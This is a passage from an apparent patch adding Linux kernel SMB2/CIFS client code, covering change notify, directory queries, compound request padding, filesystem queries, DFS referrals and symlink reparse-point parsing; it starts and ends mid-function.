++	rc = SMB2_change_notify(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++				notify.watch_tree, notify.completion_filter,
++				notify.data_len, &returned_ioctl_info, &ret_len);
++
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++	cifs_dbg(FYI, "change notify for path %s rc %d\n", path, rc);
++	if (return_changes && (ret_len > 0) && (notify.data_len > 0)) {
++		if (ret_len > notify.data_len)
++			ret_len = notify.data_len;
++		pnotify_buf = (struct smb3_notify_info __user *)ioc_buf;
++		if (copy_to_user(pnotify_buf->notify_data, returned_ioctl_info, ret_len))
++			rc = -EFAULT;
++		else if (copy_to_user(&pnotify_buf->data_len, &ret_len, sizeof(ret_len)))
++			rc = -EFAULT;
++	}
++	kfree(returned_ioctl_info);
++notify_exit:
++	free_dentry_path(page);
++	kfree(utf16_path);
++	return rc;
++}
++
++static int
++smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *path, struct cifs_sb_info *cifs_sb,
++		     struct cifs_fid *fid, __u16 search_flags,
++		     struct cifs_search_info *srch_inf)
++{
++	__le16 *utf16_path;
++	struct smb_rqst rqst[2];
++	struct kvec rsp_iov[2];
++	int resp_buftype[2];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qd_iov[SMB2_QUERY_DIRECTORY_IOV_SIZE];
++	int rc, flags = 0;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct smb2_query_directory_rsp *qd_rsp = NULL;
++	struct smb2_create_rsp *op_rsp = NULL;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int retry_count = 0;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto qdf_free;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	/* Query directory */
++	srch_inf->entries_in_buffer = 0;
++	srch_inf->index_of_last_entry = 2;
++
++	memset(&qd_iov, 0, sizeof(qd_iov));
++	rqst[1].rq_iov = qd_iov;
++	rqst[1].rq_nvec = SMB2_QUERY_DIRECTORY_IOV_SIZE;
++
++	rc = SMB2_query_directory_init(xid, tcon, server,
++				       &rqst[1],
++				       COMPOUND_FID, COMPOUND_FID,
++				       0, srch_inf->info_level);
++	if (rc)
++		goto qdf_free;
++
++	smb2_set_related(&rqst[1]);
++
++again:
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 2, rqst,
++				resp_buftype, rsp_iov);
++
++	if (rc == -EAGAIN && retry_count++ < 10)
++		goto again;
++
++	/* If the open failed there is nothing to do */
++	op_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
++	if (op_rsp == NULL || op_rsp->hdr.Status != STATUS_SUCCESS) {
++		cifs_dbg(FYI, "query_dir_first: open failed rc=%d\n", rc);
++		goto qdf_free;
++	}
++	fid->persistent_fid = op_rsp->PersistentFileId;
++	fid->volatile_fid = op_rsp->VolatileFileId;
++
++	/* Anything else than ENODATA means a genuine error */
++	if (rc && rc != -ENODATA) {
++		SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++		cifs_dbg(FYI, "query_dir_first: query directory failed rc=%d\n", rc);
++		trace_smb3_query_dir_err(xid, fid->persistent_fid,
++					 tcon->tid, tcon->ses->Suid, 0, 0, rc);
++		goto qdf_free;
++	}
++
++	atomic_inc(&tcon->num_remote_opens);
++
++	qd_rsp = (struct smb2_query_directory_rsp *)rsp_iov[1].iov_base;
++	if (qd_rsp->hdr.Status == STATUS_NO_MORE_FILES) {
++		trace_smb3_query_dir_done(xid, fid->persistent_fid,
++					  tcon->tid, tcon->ses->Suid, 0, 0);
++		srch_inf->endOfSearch = true;
++		rc = 0;
++		goto qdf_free;
++	}
++
++	rc = smb2_parse_query_directory(tcon, &rsp_iov[1], resp_buftype[1],
++					srch_inf);
++	if (rc) {
++		trace_smb3_query_dir_err(xid, fid->persistent_fid, tcon->tid,
++			tcon->ses->Suid, 0, 0, rc);
++		goto qdf_free;
++	}
++	resp_buftype[1] = CIFS_NO_BUFFER;
++
++	trace_smb3_query_dir_done(xid, fid->persistent_fid, tcon->tid,
++			tcon->ses->Suid, 0, srch_inf->entries_in_buffer);
++
++ qdf_free:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_directory_free(&rqst[1]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	return rc;
++}
++
++static int
++smb2_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
++		    struct cifs_fid *fid, __u16 search_flags,
++		    struct cifs_search_info *srch_inf)
++{
++	return SMB2_query_directory(xid, tcon, fid->persistent_fid,
++				    fid->volatile_fid, 0, srch_inf);
++}
++
++static int
++smb2_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_fid *fid)
++{
++	return SMB2_close(xid, tcon, fid->persistent_fid, fid->volatile_fid);
++}
++
++/*
++ * If we negotiate SMB2 protocol and get STATUS_PENDING - update
++ * the number of credits and return true. Otherwise - return false.
++ */
++static bool
++smb2_is_status_pending(char *buf, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	int scredits, in_flight;
++
++	if (shdr->Status != STATUS_PENDING)
++		return false;
++
++	if (shdr->CreditRequest) {
++		spin_lock(&server->req_lock);
++		server->credits += le16_to_cpu(shdr->CreditRequest);
++		scredits = server->credits;
++		in_flight = server->in_flight;
++		spin_unlock(&server->req_lock);
++		wake_up(&server->request_q);
++
++		trace_smb3_pend_credits(server->CurrentMid,
++				server->conn_id, server->hostname, scredits,
++				le16_to_cpu(shdr->CreditRequest), in_flight);
++		cifs_dbg(FYI, "%s: status pending add %u credits total=%d\n",
++				__func__, le16_to_cpu(shdr->CreditRequest), scredits);
++	}
++
++	return true;
++}
++
++static bool
++smb2_is_session_expired(char *buf)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	if (shdr->Status != STATUS_NETWORK_SESSION_EXPIRED &&
++	    shdr->Status != STATUS_USER_SESSION_DELETED)
++		return false;
++
++	trace_smb3_ses_expired(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			       le64_to_cpu(shdr->SessionId),
++			       le16_to_cpu(shdr->Command),
++			       le64_to_cpu(shdr->MessageId));
++	cifs_dbg(FYI, "Session expired or deleted\n");
++
++	return true;
++}
++
++static bool
++smb2_is_status_io_timeout(char *buf)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	if (shdr->Status == STATUS_IO_TIMEOUT)
++		return true;
++	else
++		return false;
++}
++
++static void
++smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	if (shdr->Status != STATUS_NETWORK_NAME_DELETED)
++		return;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			if (tcon->tid == le32_to_cpu(shdr->Id.SyncId.TreeId)) {
++				spin_lock(&tcon->tc_lock);
++				tcon->need_reconnect = true;
++				spin_unlock(&tcon->tc_lock);
++				spin_unlock(&cifs_tcp_ses_lock);
++				pr_warn_once("Server share %s deleted.\n",
++					     tcon->tree_name);
++				return;
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++static int
++smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
++{
++	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
++		return SMB2_lease_break(0, tcon, cinode->lease_key,
++					smb2_get_lease_state(cinode));
++
++	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
++				 CIFS_CACHE_READ(cinode) ? 1 : 0);
++}
++
++void
++smb2_set_related(struct smb_rqst *rqst)
++{
++	struct smb2_hdr *shdr;
++
++	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
++	if (shdr == NULL) {
++		cifs_dbg(FYI, "shdr NULL in smb2_set_related\n");
++		return;
++	}
++	shdr->Flags |= SMB2_FLAGS_RELATED_OPERATIONS;
++}
++
++char smb2_padding[7] = {0, 0, 0, 0, 0, 0, 0};
++
++void
++smb2_set_next_command(struct cifs_tcon *tcon, struct smb_rqst *rqst)
++{
++	struct smb2_hdr *shdr;
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = ses->server;
++	unsigned long len = smb_rqst_len(server, rqst);
++	int i, num_padding;
++
++	shdr = (struct smb2_hdr *)(rqst->rq_iov[0].iov_base);
++	if (shdr == NULL) {
++		cifs_dbg(FYI, "shdr NULL in smb2_set_next_command\n");
++		return;
++	}
++
++	/* SMB headers in a compound are 8 byte aligned. */
++
++	/* No padding needed */
++	if (!(len & 7))
++		goto finished;
++
++	num_padding = 8 - (len & 7);
++	if (!smb3_encryption_required(tcon)) {
++		/*
++		 * If we do not have encryption then we can just add an extra
++		 * iov for the padding.
++		 */
++		rqst->rq_iov[rqst->rq_nvec].iov_base = smb2_padding;
++		rqst->rq_iov[rqst->rq_nvec].iov_len = num_padding;
++		rqst->rq_nvec++;
++		len += num_padding;
++	} else {
++		/*
++		 * We can not add a small padding iov for the encryption case
++		 * because the encryption framework can not handle the padding
++		 * iovs.
++		 * We have to flatten this into a single buffer and add
++		 * the padding to it.
++		 */
++		for (i = 1; i < rqst->rq_nvec; i++) {
++			memcpy(rqst->rq_iov[0].iov_base +
++			       rqst->rq_iov[0].iov_len,
++			       rqst->rq_iov[i].iov_base,
++			       rqst->rq_iov[i].iov_len);
++			rqst->rq_iov[0].iov_len += rqst->rq_iov[i].iov_len;
++		}
++		memset(rqst->rq_iov[0].iov_base + rqst->rq_iov[0].iov_len,
++		       0, num_padding);
++		rqst->rq_iov[0].iov_len += num_padding;
++		len += num_padding;
++		rqst->rq_nvec = 1;
++	}
++
++ finished:
++	shdr->NextCommand = cpu_to_le32(len);
++}
++
++/*
++ * Passes the query info response back to the caller on success.
++ * Caller need to free this with free_rsp_buf().
++ */
++int
++smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *path, u32 desired_access,
++			 u32 class, u32 type, u32 output_len,
++			 struct kvec *rsp, int *buftype,
++			 struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec qi_iov[1];
++	struct kvec close_iov[1];
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	int rc;
++	__le16 *utf16_path;
++	struct cached_fid *cfid = NULL;
++
++	if (!path)
++		path = "";
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	/*
++	 * We can only call this for things we know are directories.
++	 */
++	if (!strcmp(path, ""))
++		open_cached_dir(xid, tcon, path, cifs_sb, false,
++				&cfid); /* cfid null if open dir failed */
++
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto qic_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++	memset(&qi_iov, 0, sizeof(qi_iov));
++	rqst[1].rq_iov = qi_iov;
++	rqst[1].rq_nvec = 1;
++
++	if (cfid) {
++		rc = SMB2_query_info_init(tcon, server,
++					  &rqst[1],
++					  cfid->fid.persistent_fid,
++					  cfid->fid.volatile_fid,
++					  class, type, 0,
++					  output_len, 0,
++					  NULL);
++	} else {
++		rc = SMB2_query_info_init(tcon, server,
++					  &rqst[1],
++					  COMPOUND_FID,
++					  COMPOUND_FID,
++					  class, type, 0,
++					  output_len, 0,
++					  NULL);
++	}
++	if (rc)
++		goto qic_exit;
++	if (!cfid) {
++		smb2_set_next_command(tcon, &rqst[1]);
++		smb2_set_related(&rqst[1]);
++	}
++
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto qic_exit;
++	smb2_set_related(&rqst[2]);
++
++	if (cfid) {
++		rc = compound_send_recv(xid, ses, server,
++					flags, 1, &rqst[1],
++					&resp_buftype[1], &rsp_iov[1]);
++	} else {
++		rc = compound_send_recv(xid, ses, server,
++					flags, 3, rqst,
++					resp_buftype, rsp_iov);
++	}
++	if (rc) {
++		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++		if (rc == -EREMCHG) {
++			tcon->need_reconnect = true;
++			pr_warn_once("server share %s deleted\n",
++				     tcon->tree_name);
++		}
++		goto qic_exit;
++	}
++	*rsp = rsp_iov[1];
++	*buftype = resp_buftype[1];
++
++ qic_exit:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_query_info_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	if (cfid)
++		close_cached_dir(cfid);
++	return rc;
++}
++
++static int
++smb2_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	struct smb2_query_info_rsp *rsp;
++	struct smb2_fs_full_size_info *info = NULL;
++	struct kvec rsp_iov = {NULL, 0};
++	int buftype = CIFS_NO_BUFFER;
++	int rc;
++
++
++	rc = smb2_query_info_compound(xid, tcon, "",
++				      FILE_READ_ATTRIBUTES,
++				      FS_FULL_SIZE_INFORMATION,
++				      SMB2_O_INFO_FILESYSTEM,
++				      sizeof(struct smb2_fs_full_size_info),
++				      &rsp_iov, &buftype, cifs_sb);
++	if (rc)
++		goto qfs_exit;
++
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++	buf->f_type = SMB2_SUPER_MAGIC;
++	info = (struct smb2_fs_full_size_info *)(
++		le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength),
++			       &rsp_iov,
++			       sizeof(struct smb2_fs_full_size_info));
++	if (!rc)
++		smb2_copy_fs_info_to_kstatfs(info, buf);
++
++qfs_exit:
++	free_rsp_buf(buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++static int
++smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++
++	if (!tcon->posix_extensions)
++		return smb2_queryfs(xid, tcon, cifs_sb, buf);
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc)
++		return rc;
++
++	rc = SMB311_posix_qfs_info(xid, tcon, fid.persistent_fid,
++				   fid.volatile_fid, buf);
++	buf->f_type = SMB2_SUPER_MAGIC;
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	return rc;
++}
++
++static bool
++smb2_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
++{
++	return ob1->fid.persistent_fid == ob2->fid.persistent_fid &&
++	       ob1->fid.volatile_fid == ob2->fid.volatile_fid;
++}
++
++static int
++smb2_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
++	       __u64 length, __u32 type, int lock, int unlock, bool wait)
++{
++	if (unlock && !lock)
++		type = SMB2_LOCKFLAG_UNLOCK;
++	return SMB2_lock(xid, tlink_tcon(cfile->tlink),
++			 cfile->fid.persistent_fid, cfile->fid.volatile_fid,
++			 current->tgid, length, offset, type, wait);
++}
++
++static void
++smb2_get_lease_key(struct inode *inode, struct cifs_fid *fid)
++{
++	memcpy(fid->lease_key, CIFS_I(inode)->lease_key, SMB2_LEASE_KEY_SIZE);
++}
++
++static void
++smb2_set_lease_key(struct inode *inode, struct cifs_fid *fid)
++{
++	memcpy(CIFS_I(inode)->lease_key, fid->lease_key, SMB2_LEASE_KEY_SIZE);
++}
++
++static void
++smb2_new_lease_key(struct cifs_fid *fid)
++{
++	generate_random_uuid(fid->lease_key);
++}
++
++static int
++smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
++		   const char *search_name,
++		   struct dfs_info3_param **target_nodes,
++		   unsigned int *num_of_nodes,
++		   const struct nls_table *nls_codepage, int remap)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	int utf16_path_len = 0;
++	struct cifs_tcon *tcon;
++	struct fsctl_get_dfs_referral_req *dfs_req = NULL;
++	struct get_dfs_referral_rsp *dfs_rsp = NULL;
++	u32 dfs_req_size = 0, dfs_rsp_size = 0;
++	int retry_count = 0;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, search_name);
++
++	/*
++	 * Try to use the IPC tcon, otherwise just use any
++	 */
++	tcon = ses->tcon_ipc;
++	if (tcon == NULL) {
++		spin_lock(&cifs_tcp_ses_lock);
++		tcon = list_first_entry_or_null(&ses->tcon_list,
++						struct cifs_tcon,
++						tcon_list);
++		if (tcon)
++			tcon->tc_count++;
++		spin_unlock(&cifs_tcp_ses_lock);
++	}
++
++	if (tcon == NULL) {
++		cifs_dbg(VFS, "session %p has no tcon available for a dfs referral request\n",
++			 ses);
++		rc = -ENOTCONN;
++		goto out;
++	}
++
++	utf16_path = cifs_strndup_to_utf16(search_name, PATH_MAX,
++					   &utf16_path_len,
++					   nls_codepage, remap);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	dfs_req_size = sizeof(*dfs_req) + utf16_path_len;
++	dfs_req = kzalloc(dfs_req_size, GFP_KERNEL);
++	if (!dfs_req) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	/* Highest DFS referral version understood */
++	dfs_req->MaxReferralLevel = DFS_VERSION;
++
++	/* Path to resolve in an UTF-16 null-terminated string */
++	memcpy(dfs_req->RequestFileName, utf16_path, utf16_path_len);
++
++	do {
++		rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++				FSCTL_DFS_GET_REFERRALS,
++				(char *)dfs_req, dfs_req_size, CIFSMaxBufSize,
++				(char **)&dfs_rsp, &dfs_rsp_size);
++		if (!is_retryable_error(rc))
++			break;
++		usleep_range(512, 2048);
++	} while (++retry_count < 5);
++
++	if (rc) {
++		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
++			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
++		goto out;
++	}
++
++	rc = parse_dfs_referrals(dfs_rsp, dfs_rsp_size,
++				 num_of_nodes, target_nodes,
++				 nls_codepage, remap, search_name,
++				 true /* is_unicode */);
++	if (rc) {
++		cifs_tcon_dbg(VFS, "parse error in %s rc=%d\n", __func__, rc);
++		goto out;
++	}
++
++ out:
++	if (tcon && !tcon->ipc) {
++		/* ipc tcons are not refcounted */
++		spin_lock(&cifs_tcp_ses_lock);
++		tcon->tc_count--;
++		/* tc_count can never go negative */
++		WARN_ON(tcon->tc_count < 0);
++		spin_unlock(&cifs_tcp_ses_lock);
++	}
++	kfree(utf16_path);
++	kfree(dfs_req);
++	kfree(dfs_rsp);
++	return rc;
++}
++
++static int
++parse_reparse_posix(struct reparse_posix_data *symlink_buf,
++		      u32 plen, char **target_path,
++		      struct cifs_sb_info *cifs_sb)
++{
++	unsigned int len;
++
++	/* See MS-FSCC 2.1.2.6 for the 'NFS' style reparse tags */
++	len = le16_to_cpu(symlink_buf->ReparseDataLength);
++
++	if (le64_to_cpu(symlink_buf->InodeType) != NFS_SPECFILE_LNK) {
++		cifs_dbg(VFS, "%lld not a supported symlink type\n",
++			le64_to_cpu(symlink_buf->InodeType));
++		return -EOPNOTSUPP;
++	}
++
++	*target_path = cifs_strndup_from_utf16(
++				symlink_buf->PathBuffer,
++				len, true, cifs_sb->local_nls);
++	if (!(*target_path))
++		return -ENOMEM;
++
++	convert_delimiter(*target_path, '/');
++	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++
++	return 0;
++}
++
++static int
++parse_reparse_symlink(struct reparse_symlink_data_buffer *symlink_buf,
++		      u32 plen, char **target_path,
++		      struct cifs_sb_info *cifs_sb)
++{
++	unsigned int sub_len;
++	unsigned int sub_offset;
++
++	/* We handle Symbolic Link reparse tag here. See: MS-FSCC 2.1.2.4 */
++
++	sub_offset = le16_to_cpu(symlink_buf->SubstituteNameOffset);
++	sub_len = le16_to_cpu(symlink_buf->SubstituteNameLength);
++	if (sub_offset + 20 > plen ||
++	    sub_offset + sub_len + 20 > plen) {
++		cifs_dbg(VFS, "srv returned malformed symlink buffer\n");
++		return -EIO;
++	}
++
++	*target_path = cifs_strndup_from_utf16(
++				symlink_buf->PathBuffer + sub_offset,
++				sub_len, true, cifs_sb->local_nls);
++	if (!(*target_path))
++		return -ENOMEM;
++
++	convert_delimiter(*target_path, '/');
++	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++
++	return 0;
++}
++
++static int
++parse_reparse_point(struct reparse_data_buffer *buf,
++		    u32 plen, char **target_path,
++		    struct cifs_sb_info *cifs_sb)
++{
++	if (plen < sizeof(struct reparse_data_buffer)) {
++		cifs_dbg(VFS, "reparse buffer is too small. Must be at least 8 bytes but was %d\n",
++			 plen);
++		return -EIO;
++	}
++
++	if (plen < le16_to_cpu(buf->ReparseDataLength) +
++	    sizeof(struct reparse_data_buffer)) {
++		cifs_dbg(VFS, "srv returned invalid reparse buf length: %d\n",
++			 plen);
++		return -EIO;
++	}
++
++	/* See MS-FSCC 2.1.2 */
++	switch (le32_to_cpu(buf->ReparseTag)) {
++	case IO_REPARSE_TAG_NFS:
++		return parse_reparse_posix(
++			(struct reparse_posix_data *)buf,
++			plen, target_path, cifs_sb);
++	case IO_REPARSE_TAG_SYMLINK:
++		return parse_reparse_symlink(
++			(struct reparse_symlink_data_buffer *)buf,
++			plen, target_path, cifs_sb);
++	default:
++		cifs_dbg(VFS, "srv returned unknown symlink buffer tag:0x%08x\n",
++			 le32_to_cpu(buf->ReparseTag));
++		return -EOPNOTSUPP;
++	}
++}
++
++static int
++smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   char **target_path, bool is_reparse_point)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct kvec err_iov = {NULL, 0};
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_create_rsp *create_rsp;
++	struct smb2_ioctl_rsp *ioctl_rsp;
++	struct reparse_data_buffer *reparse_buf;
++	int create_options = is_reparse_point ? OPEN_REPARSE_POINT : 0;
++	u32 plen;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	*target_path = NULL;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto querty_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++
++	/* IOCTL */
++	memset(&io_iov, 0, sizeof(io_iov));
++	rqst[1].rq_iov = io_iov;
++	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst[1], fid.persistent_fid,
++			     fid.volatile_fid, FSCTL_GET_REPARSE_POINT, NULL, 0,
++			     CIFSMaxBufSize -
++			     MAX_SMB2_CREATE_RESPONSE_SIZE -
++			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++	if (rc)
++		goto querty_exit;
++
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto querty_exit;
++
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++
++	create_rsp = rsp_iov[0].iov_base;
++	if (create_rsp && create_rsp->hdr.Status)
++		err_iov = rsp_iov[0];
++	ioctl_rsp = rsp_iov[1].iov_base;
++
++	/*
++	 * Open was successful and we got an ioctl response.
++	 */
++	if ((rc == 0) && (is_reparse_point)) {
++		/* See MS-FSCC 2.3.23 */
++
++		reparse_buf = (struct reparse_data_buffer *)
++			((char *)ioctl_rsp +
++			 le32_to_cpu(ioctl_rsp->OutputOffset));
++		plen = le32_to_cpu(ioctl_rsp->OutputCount);
++
++		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
++		    rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(VFS, "srv returned invalid ioctl len: %d\n",
++				 plen);
++			rc = -EIO;
++			goto querty_exit;
++		}
++
++		rc = parse_reparse_point(reparse_buf, plen, target_path,
++					 cifs_sb);
++		goto querty_exit;
++	}
++
++	if (!rc || !err_iov.iov_base) {
++		rc = -ENOENT;
++		goto querty_exit;
++	}
++
++	rc = smb2_parse_symlink_response(cifs_sb, &err_iov, target_path);
++
++ querty_exit:
++	cifs_dbg(FYI, "query symlink rc %d\n", rc);
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_ioctl_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++
++int
++smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
